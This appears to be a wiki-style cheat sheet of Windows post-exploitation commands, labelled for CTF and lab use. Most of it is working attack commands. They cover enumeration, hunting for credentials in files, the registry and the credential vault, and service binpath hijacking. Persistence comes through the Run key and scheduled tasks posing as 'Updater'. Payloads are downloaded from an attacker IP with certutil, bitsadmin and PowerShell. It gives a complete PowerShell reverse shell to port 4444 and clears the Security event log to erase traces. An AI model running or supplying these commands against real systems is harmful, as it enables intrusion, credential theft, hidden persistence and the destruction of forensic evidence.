Windows CMDs 4 Hackers
Windows Command Line for Operators — Post-Exploitation & Enumeration Arsenal (CTF/Lab Use Only)
I. 🧩 System Discovery & Recon
🧠 Basic Info
whoami
hostname
ver
systeminfo
wmic os get caption,version,buildnumber⚙️ User & Group Info
net user
net user <username>
net localgroup
net localgroup administrators
whoami /groups💡 System Architecture
echo %PROCESSOR_ARCHITECTURE%
wmic os get osarchitecture🧱 Network Overview
ipconfig /all
arp -a
netstat -ano
route print
nslookup <domain>
tracert <target>II. 🧭 Privilege Escalation Enumeration
🔒 Local Privileges
whoami /priv
net localgroup administrators
net localgroup "Remote Desktop Users"⚙️ Service Enumeration
sc query
sc queryex type= service state= all
tasklist /svc
wmic service get name,startname,startmode,state🧱 Scheduled Tasks
schtasks /query /fo LIST /v🧠 Auto Runs & Startup
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunIII. 🧩 File System & Hidden Data
🔍 File Discovery
dir /s /b C:\Users\*.txt
dir /s /b C:\*.kdbx
dir /a
attrib # view hidden/system attributes🔑 Sensitive Files
findstr /si password *.txt *.ini *.config
findstr /si "conn string" *.config
findstr /si "key" web.config🧠 Search for Flags (CTFs)
dir /s /b C:\ | find "flag"
findstr /si "flag{" C:\Users\*.*IV. 🧩 Processes, Tasks & Services
tasklist
tasklist /v
taskkill /pid <PID> /f
wmic process list brief
wmic process get name,processid,executablepathCheck parent-child relations:
wmic process get parentprocessid,processid,executablepathService manipulation:
sc stop <service>
sc config <service> binpath= "C:\Temp\reverse.exe"
sc start <service>V. ⚙️ Network & Remote Enumeration
net view \\<target>
net view /domain
net use
net use \\target\C$ /user:Administrator🧠 SMB Shares
net share
wmic share get name,path,status💡 Active Sessions
query user
qwinsta
net sessionVI. 🧱 Local Enumeration — WMI & WMIC
🧠 Hardware & Software
wmic computersystem get name,domain,manufacturer,model
wmic product get name,version⚙️ Network
wmic nicconfig get ipaddress,macaddress,servicename🔑 User Info
wmic useraccount get name,sid,statusVII. 🧠 Windows Registry Arsenal
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\ServicesFind stored credentials:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"Export keys for analysis:
reg export HKLM\Software\key C:\Temp\key.regVIII. 🧱 User Persistence & Scheduled Execution
🧠 Startup Persistence
copy shell.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"⚙️ Registry Persistence
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\update.ps1"💣 Scheduled Task
schtasks /create /sc onlogon /tn "Updater" /tr "C:\Users\Public\update.bat"IX. 🧰 File Transfer Arsenal
🔄 PowerShell
powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.2/file.exe','C:\Temp\file.exe')"💡 Certutil
certutil -urlcache -split -f http://10.10.14.2/file.exe file.exe⚙️ SMB / FTP / Bitsadmin
copy \\10.10.14.2\share\file.exe C:\Temp\
bitsadmin /transfer job /download /priority high http://10.10.14.2/file.exe C:\Temp\file.exeX. 🧩 Privilege Escalation Vectors
🔑 Service Misconfig
sc qc <service>
icacls "C:\Program Files\Service"💥 Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\"⚙️ Weak Permissions
icacls "C:\Program Files"
icacls "C:\Windows\Tasks"🧠 Token Impersonation (Lab Use)
whoami /priv
# Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilegeXI. 🧱 Credential Hunting (Legal Labs Only)
⚙️ Common Loot Paths
dir /s /b C:\Users\*\AppData\Roaming\Microsoft\Credentials\
dir /s /b C:\Users\*\AppData\Local\Microsoft\Vault\
dir /s /b C:\Users\*\AppData\Roaming\FileZilla\🔑 Cached Credentials
cmdkey /list💡 RDP History
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"XII. 🧩 Defense Awareness
🔥 Firewall Rules
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all🧠 AV Detection
sc query windefend
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName,productState⚙️ Windows Event Logs
wevtutil el | find "Security"
wevtutil qe Security /f:text /c:10XIII. 🧠 Reverse Shells (Lab / CTF Only)
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.3',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"XIV. 🧠 Post-Exploitation Clean-Up
del /f /q C:\Temp\file.exe
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /f
schtasks /delete /tn Updater /f
wevtutil cl SecurityXV. ⚡ Operator Shortcuts Table
Category
Command
Description
User Info
net user, whoami /groups
Enumerate accounts
Network
ipconfig /all, netstat -ano
View adapters/ports
Privilege Escalation
whoami /priv, sudo -l
Identify privilege context
Services
sc qc, wmic service get ...
Inspect misconfigurations
Persistence
schtasks, reg add ...Run
Maintain presence
Transfer
certutil, bitsadmin
File movement
Clean-Up
wevtutil cl, del /f /q
Erase traces
Last updated
Was this helpful?